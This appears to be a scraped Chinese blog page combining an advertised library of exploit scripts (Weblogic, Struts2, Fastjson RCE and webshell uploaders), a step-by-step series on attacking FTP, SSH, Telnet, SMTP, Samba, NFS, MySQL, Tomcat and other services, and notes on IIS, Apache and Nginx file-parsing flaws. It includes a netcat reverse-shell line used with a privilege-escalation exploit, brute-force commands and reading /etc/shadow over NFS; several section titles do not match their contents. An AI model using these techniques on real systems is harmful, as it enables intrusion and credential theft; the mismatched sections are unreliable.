精华内容
下载资源
问答
  • 2022-02-08 14:44:05

    0x01 Exphub

    目前包括Webloigc、Struts2、Tomcat、Drupal的漏洞利用脚本,均为亲测可用的脚本文件,尽力补全所有脚本文件的使用说明文档,优先更新高危且易利用的漏洞利用脚本。
    在这里插入图片描述

    0x02 Readme

    漏洞利用脚本库包括多种不同名称、类型、格式、后缀的文件,这些文件可以大致分为[漏洞验证脚本]、[漏洞利用脚本]、[远程命令执行脚本]、[shell交互脚本]、[Webshell上传脚本]

    脚本文件示例:cve-1111-1111_xxxx.py
    

    脚本文件种类[xxxx]:

    cve-1111-1111_poc [漏洞验证脚本] 仅检测验证漏洞是否存在
    cve-1111-1111_exp [漏洞利用脚本] 例如文件包含、任意文件读取等常规漏洞,具体每个脚本使用另参[使用]
    cve-1111-1111_rce [远程命令执行脚本] 命令执行漏洞利用脚本,无法交互
    cve-1111-1111_cmd [远程命令执行脚本] 命令执行漏洞利用脚本,无法交互
    cve-1111-1111_shell [远程命令执行脚本] 直接反弹Shell,或者提供简单的交互Shell以传递命令,基础交互
    cve-1111-1111_webshell [Webshell上传脚本] 自动或手动上传Webshell
    

    脚本文件格式[py]:

    cve-xxxx.py Python文件,包括py2和py3,具体哪个文件是哪个版本参照说明(执行即可见),推荐py2.7和py3.7
    cve-xxxx.sh Shell脚本,需要Linux环境运行,执行即见说明,无发行版要求
    cve-xxxx.jar Java文件,执行方式均为java -jar cve-xxxx.jar,推荐Java1.8.121
    cve-xxxx.php PHP文件,直接使用php命令执行即可
    cve-xxxx.txt 无法编写成可执行文件的漏洞Payload,将直接写成txt文本,文本内记录如何使用(一般为GET/POST请求
    

    0x03 脚本库

    Fastjson

    fastjson-1.2.24_rce.py Fastjson <=1.2.24 反序列化远程命令执行漏洞
    fastjson-1.2.41_rce.py Fastjson <=1.2.41 反序列化远程命令执行漏洞
    fastjson-1.2.42_rce.py Fastjson <=1.2.42 反序列化远程命令执行漏洞
    fastjson-1.2.43_rce.py Fastjson <=1.2.43 反序列化远程命令执行漏洞
    fastjson-1.2.45_rce.py Fastjson <=1.2.45 反序列化远程命令执行漏洞
    fastjson-1.2.47_rce.py Fastjson <=1.2.47 反序列化远程命令执行漏洞
    fastjson-1.2.62_rce.py Fastjson <=1.2.62 反序列化远程命令执行漏洞
    fastjson-1.2.66_rce.py Fastjson <=1.2.66 反序列化远程命令执行漏洞
    

    Weblogic

    cve-2014-4210_ssrf_scan.py Weblogic SSRF 扫描内网端口利用脚本
    cve-2014-4210_ssrf_redis_shell.py Weblogic SSRF漏洞内网redis未授权getshell脚本
    cve-2017-3506_poc.py Weblogic wls-wsat 远程命令执行漏洞检测脚本
    cve-2017-3506_webshell.jar Weblogic wls-wsat 远程命令执行漏洞利用,上传Webshell
    cve-2017-10271_poc.jar Weblogic wls-wsat XMLDecoder 反序列化漏洞
    cve-2017-10271_webshell.jar Weblogic wls-wsat XMLDecoder 反序列化漏洞利用脚本
    cve-2018-2628_poc.py Weblogic WLS Core Components 反序列化命令执行漏洞验证脚本
    cve-2018-2628_webshell.py Weblogic WLS Core Components 命令执行漏洞上传Webshell脚本
    cve-2018-2893_poc.py WebLogic WLS 核心组件反序列化漏洞检测脚本
    cve-2018-2893_cmd.py WebLogic WLS 核心组件反序列化漏洞利用脚本
    cve-2018-2894_poc_exp.py Weblogic 任意文件上传漏洞检测
    cve-2019-2618_webshell.py Weblogic 任意文件上传漏洞(需要账户密码)
    cve-2020-2551_poc.py Weblogic IIOP 反序列化漏洞检测脚本
    cve-2020-2555_cmd.py WebLogic GIOP 协议反序列化远程命令执行
    cve-2020-2883_cmd.py WebLogic T3 协议反序列化远程命令执行
    cve-2020-14882_rce.py WebLogic console 未授权命令执行
    

    Shiro

    shiro-1.2.4_rce.py Apache Shiro rememberMe < 1.2.4 RCE exploit script
    

    Solr

    cve-2017-12629_cmd.py Apache Solr 远程命令执行脚本
    cve-2019-0193_cmd.py Apache Solr DataImportHandler 远程代码执行漏洞利用脚本
    cve-2019-17558_cmd.py Apache Solr Velocity远程代码执行漏洞利用脚本
    

    Spring

    cve-2018-1273_cmd.py Spring 远程代码执行漏洞利用脚本
    

    Struts2

    struts2-032_cmd.py Struts2 method 任意代码执行漏洞GetShell利用脚本(CVE-2016-3081)
    struts2-032_poc.py Struts2 method 任意代码执行漏洞检测脚本(CVE-2016-3081)
    struts2-045_cmd.py Struts2 Jakarta Multipart parser 插件远程命令执行漏洞利用脚本1(CVE-2017-5638)
    struts2-045-2_cmd.py Struts2 Jakarta Multipart parser 插件远程命令执行漏洞利用脚本2(CVE-2017-5638)
    struts2-052_cmd.py Struts2 REST 插件远程代码执行漏洞利用脚本(CVE-2017-9805)
    struts2-052_webshell.py Struts2 REST 插件远程代码执行漏洞上传Webshell脚本(CVE-2017-9805)
    struts2-053_cmd.py Struts2 Freemarker 标签远程执行命令漏洞利用脚本(CVE-2017-12611)
    struts2-057_cmd.py Struts2 Namespace 远程代码执行漏洞利用脚本(CVE-2018-11776)
    

    Tomcat

    cve-2017-12615_cmd.py Tomcat 远程代码执行漏洞利用脚本
    cve-2020-1938_exp.py Tomcat 幽灵猫任意文件读取漏洞利用脚本
    

    Drupal

    cve-2018-7600_cmd.py Drupal Drupalgeddon 2 远程代码执行漏洞利用脚本
    cve-2018-7600_poc.py 该脚本可检测 CVE-2018-7602  CVE-2018-7600
    cve-2018-7602_cmd.py Drupal 内核远程代码执行漏洞利用脚本(需要账户密码)
    cve-2018-7602_poc.py 该脚本可检测 CVE-2018-7602  CVE-2018-7600
    cve-2019-6340_cmd.py Drupal 8.x REST RCE 远程执行代码漏洞利用脚本
    

    F5

    cve-2020-5902_file.py F5 BIG-IP 任意文件读取
    

    Nexus

    cve-2019-7238_cmd.py Nexus Repository Manager 3 远程代码执行漏洞利用脚本
    cve-2020-10199_poc.py Nexus Repository Manager 3 远程命令执行漏洞检测脚本
    cve-2020-10199_cmd.py Nexus Repository Manager 3 远程代码执行漏洞(可回显)
    cve-2020-10204_cmd.py Nexus Manager 3 远程命令执行漏洞利用脚本(无回显)
    cve-2020-11444_exp.py Nexus 3 任意修改admin密码越权漏洞利用脚本
    

    Jboss

    cve-2017-12149_poc.py JBoss 5.x/6.x 反序列化远程代码执行漏洞验证脚本
    cve-2017-12149_cmd.py JBoss 5.x/6.x 反序列化远程代码执行漏洞利用脚本
    

    OFBiz

    cve-2021-26295_rce.py RMI Deserializes Remote Code Execution
    

    0x04 脚本库获取

    关注公众号李白你好后台回复“脚本库
    在这里插入图片描述

    更多相关内容
  • tp5漏洞利用工具.zip

    2020-01-03 18:02:43
    Thinkphp5代码执行漏洞利用工具 (一共两个 包含利用原理)只要检测到存在Thinkphp5漏洞都能直接getshell(没狗的情况下)
  • Struts2漏洞利用工具2019版 V2.3. Struts2漏洞检测工具,请勿非法攻击他人网站,安恒大佬的作品
  • 图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
  • Java反序列化漏洞利用工具
  • jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
  • Svn源代码泄露漏洞利用工具
  • 相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中...
  • 010106漏洞利用

    千次阅读 2022-03-26 07:08:49
    6-1漏洞利用-FTP漏洞利用 1. FTP协议介绍 文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号...

    6-1漏洞利用-FTP漏洞利用

    1. FTP协议介绍

    文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。

    用户分类:
    1、Real用户  2、Administrator  3、匿名用户

    FTP文件传输格式
    1、ASCII  2、二进制格式

    2. 利用FTP匿名登录漏洞

    由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器。
    使用nc 连接ftp

    3. 利用FTP后门漏洞

    vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。

    4. FTP安全配置

    1、修改配置文件,禁止匿名用户登录。

    2、对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口。
    iptables -A  INPUT -p tcp -dport  6200 -j  DROP
    iptabels -A OUTPUT -p tcp sport  6200 -j DROP

    6-2漏洞利用-ftp不可避免的问题

    1. FTP用户名密码暴力破解

    Windows下 CMD命令添加用户、以及提升Administrator管理员权限。

    - net user 用户名 用户密码 /add
    - net localgroup administrators admin /add

    Windows下 FTP服务器添加用户操作。

    使用medusa暴力破解FTP登录

    2. FTP用户名明文密码验证

    FTP协议中用于用户认证的过程中,客户端与服务器端是通过明文进行交互信息。验证FTP登录过程中明文传输用户名和密码。

    3. FTP用户名明文密码嗅探

    利用arpspoof进行ARP嗅探

    利用Wireshark进行流量嗅探。

    4. FTP登录之后做的事情

    利用metasploit创建反弹shell上传到FTP服务器。可以利用setookit快速生成反弹shell。

    6-3漏洞利用-SSH环境搭建

    1. ubuntu搭建ssh服务端

    ubuntu下安装服务端:
    sudo apt-get install openssh-server

    2. ssh服务端服务启动与关闭

    启动、状态获取、关闭
    service ssh start
    service ssh status
    service ssh stop

    3. ubuntu搭建ssh客户端

    ubuntu下安装putty工具:
    sudo apt-get install putty-tools

    ubuntu下安装putty:
    在软件中心搜索putty进行安装

    4. 客户端连接服务端

    打开putty输入服务端信息,连接。

    ps:参考文章

    6-4漏洞利用-SSH Banner信息获取

    1. nmap获取ssh Banner信息

    nmap  -sV -p 22 IP地址

    2. Metasploit获取 ssh Banner信息

    auxiliary/scanner/ssh/ssh_version
    msf auxiliary(ssh_version) > set rhosts IP
    msf auxiliary(ssh_version) > set rport 22
    msf auxiliary(ssh_version) > exploit

    3. nc获取 ssh Banner信息

    nc IP地址 22

    4. 配置ssh规避Banner信息

    在ssh配置文件sshd_config中新增一行。DebianBanner no  再次扫描发现没有操作系统信息。

    6-5漏洞利用-SSH弱口令破解利用

    1. Medusa SSH弱口令破解

    如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令。破解出来就可以使用对应的用户名和密码登录系统。

    下面介绍Medusa对指定的ssh服务进行用户名和密码破解。

    2. SSH命令行工具登录

    一般情况下Linux下都具有ssh客户端,用来登录ssh服务端。

    可以使用 ssh 用户名@IP地址  然后根据提示输入密码。

    3. Metasploit利用SSH登录反弹Shell

    使用Metasploit可以进行ssh登录(破解),会自动建立对应的Bash shell连接。

    4. Metasploit获取Meterpreter Shell

    利用 获得的Bash shell,注入Metasploit中Meterpreter payload从而获取更强大功能的shell。

    6-6漏洞利用-SSH安全防御

    1. SSH 修改默认端口

    默认情况下,SSH使用22端口。为了安全,一般情况下都会修改默认端口。

    2. SSH 设置PGP登录

    默认情况下,SSH使用用户名和密码进行远程登录。但也可以使用密钥对进行身份验证登录(公钥与私钥)。

    生成SSH密钥对,使用puttygen。
    下载链接:https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

    使用  ssh-keygen 命令在Linux生成.ssh目录,在.ssh下新建密钥存储文件authorized_keys,并复制私钥文件到.ssh目录下。使用命令 puttygen -L “拷贝私钥文件” ,将内容拷贝到authorized_keys文件中。

    使用Putty客户端加载私钥文件进行连接。

    3. SSH 防御暴力破解用户账号

    在Linux下可以配置不能使用用户名和密码登录,只使用SSH PGP方式验证登录。规避了SSH暴力破解。

    4. Iptables设置阈值防止暴力破解

    利用Iptables对多次连接验证错误,进行账户锁定120秒。

    iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
    iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent  --update --seconds 120 --hitcount 3 -j DROP

    在设置完之后,需要重新启动ssh服务。

    6-7漏洞利用-Telnet暴力破解

    1. telnet介绍

    Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。

    虽然Telnet较为简单实用也很方便,但是在格外注重安全的现代网络技术中,Telnet并不被重用。原因在于Telnet是一个明文传送协议,它将用户的所有内容,包括用户名和密码都明文在互联网上传送,具有一定的安全隐患,因此许多服务器都会选择禁用Telnet服务。如果我们要使用Telnet的远程登录,使用前应在远端服务器上检查并设置允许Telnet服务的功能。

    Telnet服务端默认情况下使用23端口。

     2. telnet版本获取

    使用nmap获取telnet版本信息,或者使用metasploit获取对应版本信息。

     3. telnet密码破解

    使用metasploit下 针对telnet破解的模块进行用户名和密码的破解。
    在msfconsole下使用search telnet进行查询telnet可以利用的模块。

    4. telnet登录测试

    使用破解好的会话连接telnet,并执行对应命令。
    使用 sessions -l 例举建立的会话
    使用 sessions -i id  使用对应的会话。

    6-8漏洞利用-Telnet认证过程抓包分析

    1. telnet客户端连接telnet服务器

    windows下开启telnet客户端,连接telnet服务端。

    2. telnet明文密码传输

    使用wireshark抓取telnet数据包。

    6-9漏洞利用-Telnet登陆提权

    1. msf登录telnet

    在metasploit中使用  telnet_login进行登录,并使用sessions -i id 连接shell。

    2. msf连接shell下载exp

    使用 wget进行下载 

    wget http://www.exploit-db.com/download/8572 

    3. 设置kali nc监听

    使用 netcat 进行监听 后期返回的shell。 
    nc -lvp 4444

    4. 编译执行exp,获取root

    gcc 源文件  -o  exploit

    echo '#!/bin/sh' > /tmp/run

    echo '/bin/netcat -e /bin/sh 192.168.1.105 4444' >> /tmp/run

    ps -edf |grep udev


    执行exploit   具有root权限的pid -1
    ./exploit 数字pid -1 
     

    6-10漏洞利用-Smtp实验环境搭建

    1. 邮件发送与接受模型

    邮件发送使用 smtp协议,占用25端口。而邮件接收使用 pop3 或  imap 协议,分别占用 110和143端口。

    2. 添加主机名和域名

    为了在本地搭建好邮件服务器,所以需要修改对应内容。使得可以在本地进行域名解析。

    sudo gedit /etc/hosts
    127.0.0.1 mail.test.lab test


    sudo gedit /etc/hostname
    test

    修改完成之后使用 reboot进行重启,使得修改生效。

    使用 
    hostname  或 hostname -f  查看修改是否成功。

    3. ubuntu 安装postfix

    因为postfix是非常流行的smtp软件,所以ubuntu的主要库中集成了postfix,可以直接使用以下命令安装:

    sudo apt-get install postfix

    修改配置文件:
    sudo gedit /etc/postfix/main.cf

    追加子网信息
    inet_protocols = ipv4
    home_mailbox = Maildir/
    修改完成之后重新启动服务 postfix
    sudo service postfix restart ,  然后使用 netstat -nlv 来查看对应25端口是否开启。

    4. ubuntu安装dovecot

    sudo apt-get install dovecot-imapd dovecot-pop3d

    sudo gedit /etc/dovecot/conf.d/10-auth.conf
    disable_plaintest_auth = yes
    auth_mechanisms = plain login

    sudo gedit /etc/dovecot/conf.d/10-mail.conf
    mail_location=  maildir:/home/%u/Maildir
    sudo gedit /etc/dovecot/conf.d/10-master.conf
    设置 port =143  port 110

    修改权限 
    unix_listerner auth-usrdb{
        mode = 0600
        user = postfix
        group = postfix
    }
    重新启动 dovecot服务   sudo service dovecot restart   使用 netstat -nlv 查看服务端口  110 143是否开启 

    6-11漏洞利用-利用搭建环境发送邮件

    1. 发送邮件

    利用Linux下 thunderbird软件进行邮件的发送。

    2. 接收邮件

    利用thunderbird接收邮件。

    6-12漏洞利用-枚举smtp用户名

    1. telnet测试用户名

    telnet IP地址 端口 

    2. metasploit测试用户名

    在metasploit中有 smtp-enum可以对smtp上用户名进行枚举。

    use auxiliary/scanner/smtp/smtp_enum
    msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
    msf auxiliary(smtp_enum) > set rport 25
    msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
    msf auxiliary(smtp_enum) > exploit
     

    3. smtp-user-enum测试用户名 

    smtp-user-enum专门用来进行smtp用户名枚举的工具。

    smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 目标IP地址

    4. ismtp测试用户名

    ismtp -h IP地址:25 -e /root/Desktop/email.txt

    6-13漏洞利用-smtp暴力破解

    1. smtp版本信息获取

    使用metasploit中的smtp-version模块探测smtp服务的版本信息。
    目标:129.121.22.119

    2. medusa工具介绍

    medusa是一款用来破解不同协议用户名和密码的专用软件。

    3. smtp验证方式

    参考链接:https://en.wikipedia.org/wiki/SMTP_Authentication

    4. medusa破解smtp

    medusa -h 目标IP地址  -u 用户名  -P 字典文件  -M 协议模块

    6-14漏洞利用-rpcbind漏洞利用

    1. rpcbind介绍

    通俗的来说 , rpcbind是NFS中用来进行消息通知的服务。

    一般情况下rpcbind运行在111端口。并且NFS配置开启 rpcbind_enable="YES"

    2. 探测目标rpcbind

    使用 nmap -sV -p 111 IP地址  探测目标rpcbind版本信息。

    3. nmap脚本探测

    在nmap中 使用  nmap -p 111 --script=rpcinfo 目标IP地址  来探测目标的rpcinfo信息。

    4. metasploit模块探测

    使用metasploit下的  auxiliary/scanner/misc/sunrpc_portmapper 进行目标探测。

    6-15漏洞利用-smb-RCE远程命令执行

    1. samba介绍

    Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。

    一般运行在  139、445端口。

    2. 探测目标samba

    使用 nmap -sV -p 139 445  IP地址  探测目标端口服务版本信息。

    3. metasploit漏洞利用

    在Metasploit中集成了利用samba usermap RCE的脚本。
    exploit/mulit/samba/usermap_script

    在Metasploit show info可以查看漏洞信息

    4. 防御修复

    在Metasploit show info可以查看漏洞信息

    6-16漏洞利用-rlogin最高权限登陆

    1. rlogin介绍

    远程登录(rlogin)是一个 UNIX 命令,它允许授权用户进入网络中的其它 UNIX 机器并且就像用户在现场操作一样。一旦进入主机,用户可以操作主机允许的任何事情

    2. 探测目标rlogin

    使用 nmap -sV -p 512,513 IP地址  探测目标rlogin版本信息。
    512用于对远程执行的进程进行验证  、 513反弹bash shell。

    3. rlogin最高权限登录

    使用  rlogin -l root IP地址  使用最高权限登录系统

    4. 防御修复

    1、添加root登录验证密码。

    2、关闭rlogin服务,改用ssh等来管理服务器。

    6-17漏洞利用-反序列化远程命令执行漏洞

    1. Java rmi介绍

    Java RMI 指的是远程方法调用 (Remote Method Invocation)。它是一种机制,能够让在某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中的对象上的方法。

    2. 探测目标rmi

    RMI是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。 
      对于任何一个以对象为参数的RMI接口,你都可以发一个自己构建的对象,迫使服务器端将这个对象按任何一个存在于class path中的可序列化类来反序列化。 
      RMI的传输100%基于反序列化。

    3. rmi远程命令执行利用

    使用Nmap -p 1099 -sV IP地址探测目标的版本信息。

    使用Metasploit 对 rmi  RCE漏洞利用。

    4. 防御修复

    a.存在反序列化传输。  --  特别注意
    b.存在有缺陷的第三方库如commons-collections   及时升级库。

    6-18漏洞利用-后门连接

    1. 后门连接探测

    某些情况下,服务器可能存在某些后门。可以使用Nmap进行探测。

    2. nc连接后门获取权限

    Nc  目标IP  端口号 连接后门程序。

    6-19漏洞利用-nsf获取目标密码文件

    1.  nfs介绍

    NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。

    2.  探测目标nfs

    nmap --script=nfs-* IP 

    3. 探测nfs是否可以导出

    使用showmount命令确定“/”共享(文件系统的根)是否正在导出。可能需要安装nfs-common包才能使用“showmount”命令
    apt-get install nfs-common

    showmount -e IP

    4. 查看导出内容

    mkdir nfs_root
    mount -t nfs IP地址:/ ~/nfs_root -o nolock
    cat ~/nfs_root/etc/shadow

    6-20漏洞利用-proftpd测试

    1. proftpd介绍

    ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序

    http://www.proftpd.org/

    2. 探测目标proftpd

    使用 nmap -sV -p 2121 IP地址  探测目标proftpd版本信息。

    3. exploit-db搜索目标漏洞

    在 https://www.exploit-db.com/ 输入对应软件及版本搜索是否有漏洞。

    4. msf暴力破解密码

    使用metasploit下的  auxiliary/scanner/ftp/ftp_login 进行目标探测。

    6-21漏洞利用-mysql弱口令破解

    1. mysql介绍

    MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。
    MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。

    官网:https://www.mysql.com/

    2. 探测目标mysql

    使用 nmap -sV -p 3306 IP地址  探测目标mysql版本信息。

    3. msf破解mysql密码

    使用 msf下的 mysql_login模块破解mysql登录用户名和密码。

    4. 登录数据库查看数据

    使用 mysql -h IP地址  -u root 登录数据库系统

    6-22漏洞利用-postgresql数据库密码破解

    1. postgresql介绍

    PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL,不管是私用、商用、还是学术研究使用。
    https://www.postgresql.org/

    2. 探测目标postgresql

    使用 nmap -sV -p 5432 IP地址  探测目标postgresql版本信息。

    3. msf暴力破解postgresql

    在 msf下使用 postgresql_login模块 破解系统登录用户名和密码。

    4. 登录postgresql

    利用 pyadmin客户端软件登陆postgresql。

    6-23漏洞利用-postgresql代码执行利用

    1. postgresql代码执行利用

    利用 msf 下 postgresql的 代码执行获得反弹shell.

    2. 防御修复

    防御:屏蔽任意IP连接Postgresql

    修复:升级版本,安全配置

    6-24漏洞利用-vnc密码破解

    1. tomcat介绍

    Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口

    2. 探测目标tomcat

    使用 nmap -sV -p 8180 IP地址  探测目标tomcat版本信息。

    3. msf破解tomcat密码

    msf下的 auxiliary/scanner/http/tomcat_mgr_login 模块来对tomcat管理登陆密码进行破解。 

    4. msf利用tomcat管理

     在msf下可以使用use multi/http/tomcat_mgr_deploy模块利用tomcat upload 功能反弹shell。

    6-25漏洞利用-irc后门利用

    1. vnc介绍

    VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。可视化控制,类似于远程桌面,默认vnc服务端运行在5900端口

    2. 探测目标vnc

    使用 nmap -sV -p 5900 IP地址  探测目标vnc版本信息。

    3. msf破解vnc密码

    在msf下 vnc_login模块可用来对vnc服务端认证用户名和密码进行破解。

     4. vnc客户端登陆

    windows下 安装vnc viewer客户端软件连接VNC服务端。

    6-26漏洞利用-tomcat管理密码破解

    1. irc介绍

    IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务。IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并且只占用很小的带宽资源。所有用户可以在一个被称为\"Channel\"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称)。

    默认情况下,irc服务器运行在 6667端口。

    2. 探测目标irc

    使用 nmap -sV -p 6667 IP地址  探测目标irc版本信息。

    3. msf利用irc后门

    4. 修复防御

    a、升级软件版本

    b、更换其他软件

    展开全文
  • Struts2及jboss漏洞利用工具。非常好用本人几经尝试过。 Struts2的漏洞实用工具 ,以及jboss的jar cmd运行代码,良心出品
  • Nginx 畸形解析漏洞 原理: 漏洞利用: 0x03 apache解析漏洞 (1)文件解析规则漏洞 原理: 利用过程: (2)文件配置漏洞: 原理: 利用过程: 0x04 Nginx解析漏洞 空字节代码执行漏洞(Nginx ) 原理: 利用...

    目录

    解析漏洞:  

    原理:

    变化因素:

    熟知的中间件(解析漏洞) 

     0x01    IIS5.x-6.x解析漏洞:

    (1)目录解析漏洞(IIS6.0)

            原理:

            利用过程:

    (2)文件解析漏洞

            原理:

            利用过程:

    (3)可被解析的文件类型

     0x02   IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 

            原理:

            漏洞利用:

     0x03   apache解析漏洞 

    (1)文件解析规则漏洞

            原理:

            利用过程:

    (2)文件配置漏洞:

            原理:

            利用过程:

     0x04    Nginx解析漏洞

    空字节代码执行漏洞(Nginx <8.03 )

            原理:

            利用过程:

    Nginx漏洞利用基本是:

    CMS漏洞: 

    cms: 

            原理:

            利用过程:

    其他漏洞: 

    编辑器漏洞: 

    常见的编辑器:

    Ewebeditor(为例)

    原理:

    核心:

    利用过程:

    CVE等漏洞: 

    简介:

    CVE兼容

    原理:


     

    解析漏洞:

    原理:

    (中间件漏洞)

    对于用户精心构造的文件,web容器将这些文件(其他格式的文件)解析为可执行脚本进行执行

    (配合文件上传功能使用,以获取服务器的权限)

    变化因素:

    搭建平台,命名原则

    不同的搭建平台、命名原则会有不同的解析漏洞

    熟知的中间件(解析漏洞)

    IIS5.x-6.x、IIS7.5、apache、Nginx解析漏洞

     

     

    0x01        IIS5.x-6.x解析漏洞:

    (1)目录解析漏洞(IIS6.0)

    原理:

    在网站目录*.asp、*.asa文件夹下,无论任何扩展名文件格式都会被解析为asp并执行

    利用过程:

    www.xxx.com/xxx.asp/xxx.txt

    (2)文件解析漏洞

    原理:

    分号后面的不被解析

    构建在可解析执行文件后面加上;.jpg等,也会被按照前面解析格式进行解析

    利用过程:

    111.asp;.jpg

    (会以.asp文件格式执行)

    (3)可被解析的文件类型

    .asp

    .asa

    .cer

    .cdx

     

    0x02        IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

    原理:

    正常情况cgi.fix_pathinfo=1,作用是为了当文件不存在时,阻止Nginx将请求发送到后端的PHP-FPM模块(这个不是中间件漏洞,而是配置漏洞,php.ini在/usr/local/php/lib下)

    漏洞利用:

    在Fast-CGI运行模式下,在浏览器URL地址栏的文件路径后面加上/xxx.php会将解析为php文件执行

    ……/xxx.jpg

    ……/xxx.jpg/xxx.php

    (是因为php.ini配置文件中,开启了cgi.fix_pathinfo,但是这并不是Nginx或IIS7.5本身漏洞)

     

    0x03        apache解析漏洞

    (1)文件解析规则漏洞

    原理:

    Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。

    利用过程:

    ……/1.php.aaa.abc

    (会被解析为php文件执行)

    (2)文件配置漏洞:

    原理:

    顾名思义,即在Apache的conf里配置文件疏忽导致的漏洞

    利用过程:

    Apache的conf里添加一行

    ①AddHandler php5-script .php

    那么只要文件名里包含.php就会以PHP文件解析执行。

    (test.php.jpg 也会以 php 来执行)

    ②AddType application/x-httpd-php .jpg

    即使扩展名是 jpg,也以php 方式解析执行

     

    0x04        Nginx解析漏洞

    (Nginx对url是从左往右读取,并先读取文件名一直读到最后一个文件后缀才是该文件的后缀,而Apache,对url是从右往左读取,并先读取文件后缀读取第一个,默认前面都是文件名)

     

    空字节代码执行漏洞(Nginx <8.03 )

    原理:

    使用PHP-FastCGI执行PHP时,如果url里面存在%00空字节时会与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,在地址栏访问url+%00.PHP来执行其中的PHP代码

    利用过程:

    制作一张图片马

    ……/xxx.jpg%00.php

    (将图片马当成php文件执行)

    Nginx漏洞利用基本是:

    ……/1.jpg/1.php

    ……/1.jpg/1.php

    ……/1.jpg/%20\0.php

     

    CMS漏洞:

    cms:

    内容管理系统(content management system,CMS),是一种位于WEB前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统

    原理:

    在判断CMS类型后,百度相关版本的漏洞,看是否存在漏洞,并利用

    利用过程:

    判断CMS类型------->查询该CMS出现过漏洞-------->尝试是否存在这样的漏洞-------->利用漏洞获取用户名、密码后进入管理员界面查找注入(或上传一句话木马后使用蚁剑或者菜刀进行连接,再尽可能连接数据库)

     

    其他漏洞:

    编辑器漏洞:

    常见的编辑器:

    Ewebeditor,fckeditor,ckeditor,kindeditor……xxxditor

    Ewebeditor(为例)

    原理:

    在网上百度所使用的编辑器是否存在相关漏洞,并进行测试

    核心:

    找到编译器的地址(Ewebeditor为例)
    默认后台:ewebeditor/admin_login.asp
    默认数据库:ewebeditor/db/ewebeditor.mdb
    默认账号密码:admin admin/admin888

    利用过程:

